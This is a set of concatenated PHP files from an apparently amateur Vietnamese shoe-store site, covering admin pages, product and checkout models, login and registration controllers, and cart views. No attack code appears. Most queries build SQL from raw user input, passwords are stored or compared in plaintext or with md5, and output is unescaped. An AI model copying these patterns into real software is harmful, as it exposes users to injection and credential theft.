<th style="text-align:center;">Quyền</th>
<th style="text-align:center;">Giới tính</th>
<th style="text-align:center;">Địa chỉ</th>
<th style="text-align:center;">Phân quyền</th>
<th style="text-align:center;">Hành động</th>
</tr>
<?php
$stt = 1;
foreach ($data as $row) : ?>
?>
<tr>
<td><?= $stt++; ?></td>
<td><?= $row['idUser'] ?></td>
<td><?= $row['ho'] ?></td>
<td><?= $row['ten'] ?></td>
<td><?= $row['sodienthoai'] ?></td>
<td><?= $row['email'] ?></td>
<td>
<?php if ($row['idQuyen'] == 1) {
echo "admin";
}
if ($row['idQuyen'] == 2) {
echo "Người Bán Hàng";
}
if ($row['idQuyen'] == 0) {
echo "Khách hàng";
}
?>
</td>
<td><?= $row['gioitinh'] ?></td>
<td><?= $row['diachi'] ?></td>
<?php if ($_SESSION['admin'] == true) { ?>
<td>
<div style="font-size: 13px;"><a href="?action=phanquyen&id=<?= $row['idUser'] ?>&quyen=0">Khách hàng</a> <a href="?action=phanquyen&id=<?= $row['idUser'] ?>&quyen=2">Người bán hàng</a></div>
</td>
<td> <a href="?action=edit&id=<?= $row['idUser'] ?>" type="button" class="btn btn-light">Sửa</a>
<a href="?action=xoanguoidung&id=<?= $row['idUser'] ?>" onclick="return confirm('Bạn có thật sự muốn xóa ?');" type="button" class="btn btn-danger" title="Xóa người dùng">
<i class="fa fa-times"></i></a>
</td>
<!-- phân quyền -->
<?php } else {
} ?>
</tr>
<?php
endforeach;
?>
</table>
<style type="text/css">
.pagination {
padding: 0px;
margin: 0px;
}
</style>
</div>
</div>
</div>
<!-- end content -->
<script>
function myFunction() {
var x = document.getElementById("myDIV");
if (x.style.display === "block") {
x.style.display = "none";
} else {
x.style.display = "block";
}
}
</script><file_sep>/model/show_thanhtoan.php
<?php
require_once('ketnoi.php');
/**
*
*/
class thanhtoan
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function loaisanpham() //đang
{
$query = "SELECT * from loaisanpham limit 0,4";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function chitiet_donhang($tendangnhap)
{
$query = "SELECT * FROM user WHERE tendangnhap = '$tendangnhap'";
$data = $this->conn->query($query)->fetch_assoc();
return $data;
}
function chitiet_khuyenmai($tendangnhap)
{
$query = "SELECT * FROM user WHERE tendangnhap = '$tendangnhap'";
$data = $this->conn->query($query)->fetch_assoc();
return $data;
}
function chitiet_sanpham($Dongia)
{
// $query = "SELECT * FROM sanpham WHERE Dongia = '$Dongia' ";
$query = "SELECT * FROM sanpham INNER JOIN khuyenmai ON sanpham.idKM = khuyenmai.idKM WHERE Dongia = '$Dongia'";
$data = $this->conn->query($query)->fetch_assoc();
return $data;
}
}
?><file_sep>/controller/quenmatkhau_controller.php
<?php
// require_once('views/index.php'); gọi câu mới xuất hiện giao diện được
require_once('./model/quenMK.php');
/**
*
*/
class quenmk
{
var $quenmk_controller;
function __construct()
{
$this->quenmk_controller = new Matkhau();
}
public function list()
{
$data_loaisanpham = $this->quenmk_controller->loaisanpham();
$email = filter_input(INPUT_POST, 'email_laymk');
$email_laymk = $this->quenmk_controller->laymatkhau($email);
require_once('views/index.php');
}
public function laymk()
{
$data_loaisanpham = $this->quenmk_controller->loaisanpham();
$email = filter_input(INPUT_POST, 'email_laymk');
$mk = $this->quenmk_controller->laymatkhau($email);
if($mk){
$ketqua = true;
}
require_once('views/index.php');
}
}
?><file_sep>/controller/dangnhap_controller.php
<?php
require_once('./model/dangnhap.php');
/**
*
*/
class dangnhap_dangky_controller
{
var $dangnhap_dangky_model;
function __construct()
{
$this->dangnhap_dangky_model = new dangnhap_dangky();
}
public function dangky()
{
$ho = filter_input(INPUT_POST, 'ho_dk');
$ten =filter_input(INPUT_POST, 'ten_dk');
$email =filter_input(INPUT_POST, 'email_dk');
$diachi =filter_input(INPUT_POST, 'diachi_dk');
$gioitinh =filter_input(INPUT_POST, 'gioitinh_dk');
$sodienthoai =filter_input(INPUT_POST, 'sdt_dk');
$tendangnhap =filter_input(INPUT_POST, 'tendangnhap_dk');
$mk_dk = filter_input(INPUT_POST, 'matkhau_dk');
// $matkhau = md5("$mk_dk");
$this->dangnhap_dangky_model->dangky_model($ho, $ten, $email, $diachi, $gioitinh, $sodienthoai, $tendangnhap, $mk_dk);
}
public function dangnhap()
{
$tendangnhap =filter_input(INPUT_POST, 'tendangnhap_dn');
$mk_dn =filter_input(INPUT_POST, 'matkhau_dn');
// $matkhau = md5($mk_dn);
$matkhau =$mk_dn;
$this->dangnhap_dangky_model->dangnhap_model($tendangnhap, $matkhau);
}
public function dangxuat()
{
if(isset($_SESSION['tendangnhap'])){
unset($_SESSION['tendangnhap']);
unset($_SESSION['matkhau']);
echo "<script language='javascript'></script>"; //alert('Đăng xuất thành công');
echo "<script language='javascript'>location.href='?action=trangchu';</script>";
}
}
public function taikhoan()
{
$data_loaisanpham = $this->dangnhap_dangky_model->loaisanpham();
$tendangnhap = $_SESSION['tendangnhap'];
$data_taikhoan = $this->dangnhap_dangky_model->taikhoan($tendangnhap);
// sửa mật khẩu
$mk_nhap = filter_input(INPUT_POST, 'matkhau');
$matkhau_nhap = md5($mk_nhap);
$mk_moi = filter_input(INPUT_POST, 'matkhaumoi');
$matkhau_moi = md5($mk_moi);
$idUser = filter_input(INPUT_POST, 'idUser');
// chỗ nàu cho hiện m$loi echo $data_taikhoan['ten'];
if($matkhau_nhap != $data_taikhoan['matkhau']){
$mess = false;
}else{
$mess = true;
$this->dangnhap_dangky_model->suamk($idUser, $matkhau_moi);
}
require_once('views/index.php');
}
public function suataikhoan()
{
$ho = filter_input(INPUT_POST, 'ho');
$ten =filter_input(INPUT_POST, 'ten');
$email =filter_input(INPUT_POST, 'email');
$diachi =filter_input(INPUT_POST, 'diachi');
$gioitinh =filter_input(INPUT_POST, 'gioitinh');
$sodienthoai =filter_input(INPUT_POST, 'sodienthoai');
$tendangnhap =filter_input(INPUT_POST, 'tendangnhap');
$matkhau =filter_input(INPUT_POST, 'matkhau');
$idUser = filter_input(INPUT_POST, 'idUser');
$this->dangnhap_dangky_model->suataikhoan($idUser, $ho, $ten, $email, $diachi, $gioitinh, $sodienthoai, $tendangnhap);
require_once('views/index.php');
}
}
?><file_sep>/admin/model_admin/sanpham.php
<?php
// MODEL CHO CÁC THÔNG TIN SẢN PHẨM
require_once('ketnoi.php');
/**
*
*/
class sanpham
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function phantrang()
{
$query = "SELECT * FROM sanpham";
return $this->conn->query($query);
}
function phantrang_timkiem($timkiem_sp)
{
$query = "SELECT * FROM sanpham WHERE tenSP LIKE '%$timkiem_sp%'";
return $this->conn->query($query);
}
function all_them()
{
$query = "SELECT * FROM sanpham";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all($batdau, $gioihan)
{
$query = "SELECT * FROM sanpham ORDER BY soluong LIMIT $batdau, $gioihan";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function timkiem_sp($timkiem_sp, $batdau, $gioihan)
{
$query = "SELECT * FROM sanpham WHERE tenSP LIKE '%$timkiem_sp%' LIMIT $batdau, $gioihan";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function find($id)
{
$query = "SELECT * FROM sanpham
INNER JOIN color ON sanpham.idcolor = color.idcolor
INNER JOIN size ON sanpham.idsize = size.idsize
WHERE idSP=$id";
return $this->conn->query($query)->fetch_assoc();
}
function update($idSP, $idKM, $idLoaiSP, $idcolor, $idsize, $tenSP, $Dongia, $anh1, $anh2, $anh3, $ngaynhap, $mota, $soluong)
{
$query="UPDATE sanpham SET idKM='$idKM', idLoaiSP='$idLoaiSP', idcolor='$idcolor', idsize='$idsize', tenSP='$tenSP', Dongia='$Dongia', anh1='$anh1', anh2='$anh2', anh3='$anh3', ngaynhap='$ngaynhap', mota='$mota', soluong='$soluong' WHERE idSP='$idSP';";
$result = $this->conn->query($query);
if($result == true){
header('Location: ?action=sanpham');
}
}
function insert($idKM, $idLoaiSP, $idcolor, $idsize, $tenSP, $Dongia, $anh1, $anh2, $anh3, $ngaynhap, $mota, $soluong)
{
$query= "INSERT INTO sanpham (idKM, idLoaiSP, idcolor, idsize, tenSP, Dongia, anh1, anh2, anh3, ngaynhap, mota, soluong)
VALUES ('$idKM','$idLoaiSP','$idcolor', '$idsize', '$tenSP', '$Dongia', '$anh1', '$anh2', '$anh3', '$ngaynhap', '$mota', '$soluong') ";
$result = $this->conn->query($query);
if($result == true){
header('location: ?action=sanpham');
}
else{
header('location: ?action=them_sanpham_giaodien');
}
}
// nếu thêm vào một sản phẩm đã có thì cộng vào số lượng
function insert_trung($idSP, $soluong_them)
{
$query= "UPDATE sanpham SET soluong = '$soluong_them' WHERE idSP = '$idSP' ";
$result = $this->conn->query($query);
if($result == true){
header('location: ?action=sanpham');
}
else{
header('location: ?action=them_sanpham_giaodien');
}
}
function delete($id) //dang
{
$query = "DELETE FROM sanpham WHERE idSP='$id' ";
$result = $this->conn->query($query);
if($result == true){
echo "<script> ";
echo "location.href='?action=sanpham';</script>";
}else{
echo "<script> ";
echo "location.href='?action=sanpham';</script>";
}
}
function khuyenmai()
{
$query = "SELECT * FROM khuyenmai";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function mau()
{
$query = "SELECT * FROM color";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function size()
{
$query = "SELECT * FROM size";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function loaisp()
{
$query = "SELECT * FROM loaisanpham";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
public function them_soluong($idSP, $soluong_them)
{
$query= "UPDATE sanpham SET soluong = '$soluong_them' WHERE idSP = '$idSP' ";
$result = $this->conn->query($query);
if($result == true){
header('location: ?action=sanpham');
}
else{
header('location: ?action=sanpham');
}
}
}
?><file_sep>/admin/views_admin/layout/layout2.php
<div id="viewport">
<!-- Sidebar -->
<div id="sidebar">
<header>
<a href="../?action=trangchu" title="xem trang web">
<div style="color:white;" href="#">Quản Trị Viên<br> </div>
<div style="line-height: 1px; color:white;font-size: 10px;"><span style="color:orange;">SHOE</span> STORE</div>
</a>
</header>
<ul class="nav">
<li>
<a href="?action=trangchu">
<i class="fa fa-home"></i>Trang chủ
</a>
</li>
<li>
<a href="?action=taikhoan">
<i class="fa fa-table"></i>Quản lý tài khoản
</a>
</li>
<li>
<a href="?action=sanpham">
<i class="fa fa-table"></i>Quản lý sản phẩm
</a>
</li>
<li>
<a href="?action=loaisanpham">
<i class="fa fa-table"></i>Quản lý loại sản phẩm
</a>
</li>
<li>
<a href="?action=hoadon">
<i class="fa fa-table"></i>Hóa đơn
</a>
</li>
<li>
<a href="?action=banner">
<i class="fa fa-table"></i> Quản lý banner
</a>
</li>
<li>
<a href="?action=khuyenmai">
<i class="fa fa-table"></i>Quản lý khuyến mãi
</a>
</li>
</ul>
</div>
<!-- Content -->
<div id="content">
<nav class="navbar navbar-default">
<div class="container-fluid">
<ul class="nav navbar-nav navbar-left">
<li>
<!--
<div class="search_box pull-right">
<input type="text" placeholder="Search"/> 
<a href="#"><i class="fa fa-search" id="i1"></i></a>
<span style="font-size: 20px;padding-left: 10px;"> |</span>
</div>
-->
</li>
<li>
<a href="#" style="margin-right: 30px;">
<img class="anhuser" src="public_admin/image/author.jpg" alt=""> 
<?php
if(isset($_SESSION['tendangnhap'])){
echo "Xin chào ". $_SESSION['tendangnhap'];
}else{
echo "Xin Chào ...";
}
?>
</a>
</li>
</ul>
<!--
<ul class="nav navbar-nav navbar-right" style="padding-right: 30px;">
<li class="nav2">
<a href="#"><i class="fa fa-bell nav1"></i></a>
</li>
<li>
<a href="#"><i class="fa fa-envelope nav1"></i></a>
</li>
</ul>
-->
</div>
</nav>
</div>
</div><file_sep>/views/hoanthanhdonhang/hoanthanhdonhang.php
<div class="shopping-cart">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="location">
<ul>
<li><a href="index.html" title="go to homepage">Home<span>/</span></a> </li>
<li><strong>Hoàn thành đơn hàng</strong></li>
</ul>
</div>
</div>
</div>
<!-- pages-title-start -->
<div class="pages-title section-padding">
<div class="container">
<div class="row">
<div class="col-xs-12">
<div class="pages-title-text text-center">
<h2>HOÀN TẤT ĐƠN HÀNG</h2>
</div>
</div>
</div>
</div>
</div>
<!-- pages-title-end -->
<!-- order-complete content section start -->
<section class="pages checkout order-complete section-padding">
<div class="container">
<div class="row">
<div class="col-xs-12 text-center">
<div class="complete-title">
<p>Cảm ơn bạn. Đơn đặt hàng của bạn đã được nhận; Đã nhận được đơn đặt hàng của bạn.</p>
<p>
Vui Lòng Chờ Xét Duyệt
<a href="?action=huy_session" style="color:red;font-weight: bold;"> Về trang chủ</a>
</p>
</div>
</div>
</div>
<div class="row">
<div class="col-xs-12 col-sm-6">
<div class="padding60">
<div class="log-title">
<h3><strong>ĐƠN ĐẶT HÀNG CỦA BẠN</strong></h3>
</div>
<div class="cart-form-text pay-details">
<table>
<thead>
<tr>
<th>Sản Phẩm</th>
<td>Tiền</td>
</tr>
</thead>
<tbody>
<tr>
<th><?php foreach ($_SESSION['sanpham'] as $value) { ?>
<?php echo $value['tenSP'].'<br>'; ?>
<?php } ?></th>
<td><?= number_format($_SESSION['tongtien']) ?> VND</td>
</tr>
<tr>
<th>Khuyến mãi</th>
<td><?php echo $_SESSION['giatriKM'].'%'; ?></td>
</tr>
</tbody>
<tfoot>
<tr>
<th>Tổng tiền</th>
<td>
<?php
if($_SESSION['giatriKM'] != 0){
$_SESSION['tongtien_KM'] = ( $_SESSION['tongtien'] - ($_SESSION['tongtien'] * ($_SESSION['giatriKM'] )) / 100 );
echo number_format($_SESSION['tongtien_KM']).' VND' ;
}
else{
echo number_format($_SESSION['tongtien']).' VND';
}
?>
</td>
</tr>
</tfoot>
</table>
</div>
</div>
</div>
<div class="col-xs-12 col-sm-6">
<div class="order-details padding60">
<div class="log-title">
<h3><strong>CHI TIẾT KHÁCH HÀNG</strong></h3>
</div>
<div class="por-dse clearfix">
<ul>
<li><span>Tên KH<strong>:</strong></span><?php echo $data_user['ten']; ?></li>
<li><span>Email<strong>:</strong></span> <?php echo $data_user['email']; ?> </li>
<li><span>Số ĐT<strong>:</strong></span> <?php echo $data_user['sodienthoai']; ?> </li>
</ul>
</div>
</div>
<div class="order-address bill padding60">
<div class="log-title">
<h3><strong>ĐỊA CHỈ LIÊN HỆ</strong></h3>
</div>
<p>Phone: <?php echo $data_user['sodienthoai']; ?></p>
<p>Email: <?php echo $data_user['email']; ?></p>
</div>
</div>
</div>
</div>
</section>
</div>
</div>
<!-- order-complete content section end -->
<!-- Tất cả bao gồm có session['giatriKM'] session['sanpham'] : cái này kiểu mảng chạy foeach
session['tongtien_KM'] và session['tongtien'] session['thanhtien']
session[tendangnhap] session['matkhau'] session['admin']
--><file_sep>/model/show_cuahang.php
<?php
require_once('ketnoi.php');
/**
*
*/
class cuahang
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function loaisanpham() //đang
{
$query = "SELECT * from loaisanpham limit 0,4";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function sanpham_cuahang() //đang
{
$query = "SELECT *
from (((sanpham
INNER JOIN size ON sanpham.idsize = size.idsize)
INNER JOIN color ON sanpham.idcolor = color.idcolor)
INNER JOIN khuyenmai ON sanpham.idKM = khuyenmai.idKM)";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
//tìm kiếm sản phẩm chung
function timkiem_sp($timkiem_sp)
{
$query = "SELECT *
from (((sanpham
INNER JOIN size ON sanpham.idsize = size.idsize)
INNER JOIN color ON sanpham.idcolor = color.idcolor)
INNER JOIN khuyenmai ON sanpham.idKM = khuyenmai.idKM)
WHERE tenSP LIKE '%$timkiem_sp%' ORDER BY idSP";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function sanpham_cuahangtheoid($idLoaiSP) //đang
{
$query = "SELECT *
from (((sanpham
INNER JOIN size ON sanpham.idsize = size.idsize)
INNER JOIN color ON sanpham.idcolor = color.idcolor)
INNER JOIN khuyenmai ON sanpham.idKM = khuyenmai.idKM)
WHERE idLoaiSP = $idLoaiSP";
return $this->conn->query($query);
}
function color()
{
$query = "SELECT * FROM color";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function size()
{
$query = "SELECT * FROM size";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
//lựa chọn sản phẩm theo màu, size
function chonsanpham_mau($id)
{
$query = "SELECT *
from (((sanpham
INNER JOIN size ON sanpham.idsize = size.idsize)
INNER JOIN color ON sanpham.idcolor = color.idcolor)
INNER JOIN khuyenmai ON sanpham.idKM = khuyenmai.idKM)
WHERE color.idcolor = $id ";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function chonsanpham_size($id)
{
$query = "SELECT *
from (((sanpham
INNER JOIN size ON sanpham.idsize = size.idsize)
INNER JOIN color ON sanpham.idcolor = color.idcolor)
INNER JOIN khuyenmai ON sanpham.idKM = khuyenmai.idKM)
WHERE size.idsize = $id";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function chonsanpham_gia($a, $b) //đang làm
{
$query = "SELECT *
from (((sanpham
INNER JOIN size ON sanpham.idsize = size.idsize)
INNER JOIN color ON sanpham.idcolor = color.idcolor)
INNER JOIN khuyenmai ON sanpham.idKM = khuyenmai.idKM)
WHERE Dongia > $a AND Dongia < $b ";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function chonsanpham_KM($gtkm)
{
$query = " SELECT * FROM (((sanpham
INNER JOIN khuyenmai ON khuyenmai.idKM = sanpham.idKM)
INNER JOIN size ON sanpham.idsize = size.idsize)
INNER JOIN color ON sanpham.idcolor = color.idcolor)
WHERE giatriKM = '$gtkm' ";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
/* Phân trang
public function get_all_product(){
$query="SELECT * FROM sanpham";
$result = $this->db->select($query);
return $result;
}
$product_all=$product->get_all_product();
$product_count=mysqli_num_rows($product_all);
$product_button=ceil($product_count/6);
$i=1;
echo '<p>Trang:</p>';
for($i=1;$i<=$product_button;$i++)
{
echo '<a href="shop.php?trang='.$i.'">'.$i.'</a>';
}
*/
}
<file_sep>/admin/views_admin/loaisanpham/quanlyloaisanpham.php
<div class="col-md-12">
<div style="margin-bottom:5px;">
<?php if ($_SESSION['admin'] == true) { ?>
<a href="?action=themloaisanpham_giaodien" class="btn btn-primary">Thêm</a>
<?php } else {
} ?>
</div>
<div class="panel panel-primary">
<div class="panel-heading">Danh sách Danh Mục</div>
<div class="panel-body">
<table class="table table-bordered table-hover " style="text-align:center;">
<tr>
<th style="text-align:center;">STT</th>
<th style="text-align:center;">ID</th>
<th style="text-align:center;">Tên danh mục</th>
<th style="text-align:center;">Hành động</th>
</tr>
<?php
$stt = 1;
foreach ($data as $value) :
?>
<tr>
<td><?= $stt++; ?></td>
<td><?= $value['idLoaiSP'] ?></td>
<td><?= $value['tenLSP'] ?></td>
<td>
<?php if ($_SESSION['admin'] == true) { ?>
<a href="?action=sualoaisanpham&id=<?= $value['idLoaiSP'] ?>" type="button" class="btn btn-light">Sửa</a>
<a href="?action=xoaloaisanpham&id=<?= $value['idLoaiSP'] ?>" onclick="return confirm('Bạn có thật sự muốn xóa ?');" type="button" class="btn btn-danger" title="Xóa ">
<i class="fa fa-times"></i></a>
<?php } else {
} ?>
</td>
</tr>
<?php
endforeach;
?>
</table>
<style type="text/css">
.pagination {
padding: 0px;
margin: 0px;
}
</style>
</div>
</div>
</div>
<file_sep>/admin/views_admin/loaisanpham/sua.php
<div class="col-md-12">
<div class="panel panel-primary">
<div class="panel-heading">SửaDanh mục</div>
<div class="panel-body">
<form method="POST" action="?action=sualoaisanpham_xl" enctype="multipart/form-data">
<!-- rows -->
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Tên danh muc</div>
<div class="col-md-10">
<input type="hidden" name="idLoaiSP" value=<?php echo $data['idLoaiSP']; ?>>
<input required type="text" name="tenLSP" value=<?php echo $data['tenLSP']; ?>>
</div>
</div>
<div class="row" style="margin-top:25px;">
<div class="col-md-2"></div>
<div class="col-md-10">
<button type="submit" name="create" class="btn btn-primary">Cập nhập</button>
</div>
</div>
<!-- end rows -->
</form>
</div>
</div>
</div><file_sep>/views/giohang/giohang2.php
<div class="pages-title section-padding">
<div class="container">
<div class="row">
<div class="col-xs-12">
<div class="pages-title-text text-center">
<h2>Giỏ hàng của bạn</h2>
</div>
</div>
</div>
</div>
</div>
<section id="cart_items" style="margin-top: -50px; margin-bottom: -50px;">
<div class="container">
<div class="breadcrumbs">
<ol class="breadcrumb">
<li><a href="#">Home</a></li>
<li class="active">Giỏ Hàng Của Bạn</li>
</ol>
</div>
<div class="table-responsive cart_info">
<!-- &a=?php foreach ($_SESSION['sanpham'] as $value) { echo $value['Dongia'].'&b=';}?> -->
<form action="?action=thanhtoan&a=<?php foreach ($_SESSION['sanpham'] as $value) { echo $value['Dongia'].'&b=';}?>" method="POST">
<table class="table table-condensed">
<thead>
<tr class="cart_menu">
<td >Sản Phẩm</td>
<td>Thông Tin sản Phẩm</td>
<td >Giá</td>
<td >SL mua</td>
<td >SL trong Kho</td>
<td>Thành Tiền</td>
</tr>
</thead>
<tbody class="tbody">
<?php if(isset($_SESSION['sanpham'])){
$_SESSION['tongtien'] = 0;
$soluong = 0;
foreach ($_SESSION['sanpham'] as $key=>$value) {
$soluong++;
?> <!-- $key là id sp -->
<tr>
<td class="cart_product">
<img height='90' width="100" src="admin/public_admin/image/sanpham/<?= $value['anh1'] ?>">
</td>
<td class="cart_description">
<h4><a href=""><?= $key.$value['tenSP'] ?></a></h4>
<p> </p>
</td>
<td class="cart_price">
<p><?= $value['Dongia'] ?>.000 VND</p>
</td>
<td class="cart_quantity">
<div class="cart_quantity_button">
<?php
if($value['soluong_kho'] >0 ){ ?>
<a class="cart_quantity_up" href="?action=giohang&act=update_giohang&id=<?= $value['idSP'] ?>"> + </a>
<?php }else{ ?>
<a class="cart_quantity_up" href="" onclick="TB_hethang()"> + </a>
<?php } ?>
<input class="cart_quantity_input" size="2" type="text" name="soluong" value="<?php echo $value['soluong']; ?>">
<a class="cart_quantity_down" href="?action=giohang&act=update_giohang_tru&id=<?= $value['idSP'] ?>"> - </a>
</div>
</td>
<td style="width: 150px; text-align: center;font-weight: bold;font-size: 20px;color: orange;">
<?php
if($value['soluong_kho'] < 0){
echo "Lỗi";
}else{
echo $value['soluong_kho'];
}
?>
</td>
<td class="cart_total" style="text-align: center;">
<p class="cart_total_price"><?php $_SESSION['tongtien'] += $value['thanhtien']; echo $value['thanhtien'].'.000 VND'; ?></p>
</td>
<td class="cart_delete">
<a class="cart_quantity_delete" href="?action=giohang&act=xoagiohang&id=<?= $value['idSP'] ?>"><i class="fa fa-times"></i></a>
</td>
</tr>
<?php
$_SESSION['soluong'] = $soluong;
} }?>
<tr>
<td>
</td>
<td>
</td>
<td>
</td>
<td>
</td>
<td>
</td>
<td style="font-size: 20px; color:orange; font-weight: bold; padding: 10px;">
Tổng Tiền: <?php
if(isset($_SESSION['tongtien'])){
echo $_SESSION['tongtien'].'.000 VND';
echo $_SESSION['soluong'];
}else{
echo "";
}
?>
</td>
<td>
</td>
</tr>
</tbody>
</table>
<a href="?action=giohang&act=xoagiohang_all" class="pull-right" style="padding: 30px; padding-bottom: 100px;">
Hủy giỏ hàng <i class="fa fa-times"></i>
</a>
<div style="padding: 30px; padding-bottom: 100px;">
<input class="pull-right" type="submit" value="Xác Nhận Giỏ Hàng">
</div>
</form>
</div>
</div>
</section> <!--/#cart_items-->
<script>
function TB_hethang() {
alert("Sản phẩm trong kho đã hết!");
}
</script>
<div class="pages-title section-padding">
<div class="container">
<div class="row">
<div class="col-xs-12">
<div class="pages-title-text text-center">
<h2>Giỏ hàng của bạn</h2>
</div>
</div>
</div>
</div>
</div>
<section id="cart_items" style="margin-top: -50px; margin-bottom: -50px;">
<div class="container">
<div class="breadcrumbs">
<ol class="breadcrumb">
<li><a href="#">Home</a></li>
<li class="active">Giỏ Hàng Của Bạn</li>
</ol>
</div>
<div class="table-responsive cart_info">
<!-- &a=?php foreach ($_SESSION['sanpham'] as $value) { echo $value['Dongia'].'&b=';}?> -->
<form action="?action=thanhtoan&a=<?php foreach ($_SESSION['sanpham'] as $value) { echo $value['Dongia'].'&b=';}?>" method="POST">
<table class="table table-condensed">
<thead>
<tr class="cart_menu">
<td class="image" style="width: 150px;">Sản Phẩm</td>
<td class="description">Thông Tin sản Phẩm</td>
<td class="price">Giá</td>
<td class="quantity">SL mua</td>
<td class="quantity">SL trong Kho</td>
<td class="total">Thành Tiền</td>
</tr>
</thead>
<tbody class="tbody">
<?php if(isset($_SESSION['sanpham'])){
$_SESSION['tongtien'] = 0;
$soluong = 0;
foreach ($_SESSION['sanpham'] as $key=>$value) {
$soluong++;
?> <!-- $key là id sp -->
<tr>
<td class="cart_product">
<img height='90' width="100" src="admin/public_admin/image/sanpham/<?= $value['anh1'] ?>">
</td>
<td class="cart_description">
<h4><a href=""><?= $key.$value['tenSP'] ?></a></h4>
<p> </p>
</td>
<td class="cart_price">
<p><?= $value['Dongia'] ?>.000 VND</p>
</td>
<td class="cart_quantity">
<div class="cart_quantity_button">
<?php
if($value['soluong_kho'] >0 ){ ?>
<a class="cart_quantity_up" href="?action=giohang&act=update_giohang&id=<?= $value['idSP'] ?>"> + </a>
<?php }else{ ?>
<a class="cart_quantity_up" href="" onclick="TB_hethang()"> + </a>
<?php } ?>
<input class="cart_quantity_input" size="2" type="text" name="soluong" value="<?php echo $value['soluong']; ?>">
<a class="cart_quantity_down" href="?action=giohang&act=update_giohang_tru&id=<?= $value['idSP'] ?>"> - </a>
</div>
</td>
<td style="width: 150px; text-align: center;font-weight: bold;font-size: 20px;color: orange;">
<?php
if($value['soluong_kho'] < 0){
echo "Lỗi";
}else{
echo $value['soluong_kho'];
}
?>
</td>
<td class="cart_total" style="text-align: center;">
<p class="cart_total_price"><?php $_SESSION['tongtien'] += $value['thanhtien']; echo $value['thanhtien'].'.000 VND'; ?></p>
</td>
<td class="cart_delete">
<a class="cart_quantity_delete" href="?action=giohang&act=xoagiohang&id=<?= $value['idSP'] ?>"><i class="fa fa-times"></i></a>
</td>
</tr>
<?php
$_SESSION['soluong'] = $soluong;
} }?>
<tr>
<td>
</td>
<td>
</td>
<td>
</td>
<td>
</td>
<td>
</td>
<td style="font-size: 20px; color:orange; font-weight: bold; padding: 10px;">
Tổng Tiền: <?php
if(isset($_SESSION['tongtien'])){
echo $_SESSION['tongtien'].'.000 VND';
echo $_SESSION['soluong'];
}else{
echo "";
}
?>
</td>
<td>
</td>
</tr>
</tbody>
</table>
<a href="?action=giohang&act=xoagiohang_all" class="pull-right" style="padding: 30px; padding-bottom: 100px;">
Hủy giỏ hàng <i class="fa fa-times"></i>
</a>
<div style="padding: 30px; padding-bottom: 100px;">
<input class="pull-right" type="submit" value="Xác Nhận Giỏ Hàng">
</div>
</form>
</div>
</div>
</section> <!--/#cart_items-->
<script>
function TB_hethang() {
alert("Sản phẩm trong kho đã hết!");
}
</script>
<!-- cart item area start -->
<div class="shopping-cart">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="location">
<ul>
<li><a href="index.html" title="go to homepage">Home<span>/</span></a> </li>
<li><strong> Shopping cart</strong></li>
</ul>
</div>
</div>
</div>
<div class="row">
<div class="col-md-12">
<div class="table-responsive">
<form action="?action=thanhtoan&a=<?php foreach ($_SESSION['sanpham'] as $value) {
echo $value['Dongia'] . '&b=';
} ?>" method="POST">
<table class="table-bordered ">
<thead>
<tr>
<th class="cart-item-img">Sản Phẩm</th>
<th class="cart-product-name">Thông tin sản phẩm</th>
<th class="edit">Số lượng mua</th>
<th class="move-wishlist">Số lượng kho</th>
<th class="unit-price">Thành tiền</th>
<th class="remove-icon">Delete</th>
</tr>
</thead>
<tbody class="text-center">
<?php if (isset($_SESSION['sanpham'])) {
$_SESSION['tongtien'] = 0;
$soluong = 0;
foreach ($_SESSION['sanpham'] as $key => $value) {
$soluong++;
?>
<!-- $key là id sp -->
<tr>
<td class="cart-item-img">
<a href="single-product.html">
<img height='90' width="100" src="admin/public_admin/image/sanpham/<?= $value['anh1'] ?>">
</a>
</td>
<td class="cart-product-name">
<a href="single-product.html">Cras neque metus</a>
</td>
<td class="edit">
<a href="#"><?= $key . $value['tenSP'] ?></a>
</td>
<td class="move-wishlist">
<a href="#"><?= number_format($value['Dongia']) ?></a>
</td>
<td class="unit-price">
<span>
<div class="cart_quantity_button">
<?php
if ($value['soluong_kho'] > 0) { ?>
<a class="cart_quantity_up" href="?action=giohang&act=update_giohang&id=<?= $value['idSP'] ?>"> + </a>
<?php } else { ?>
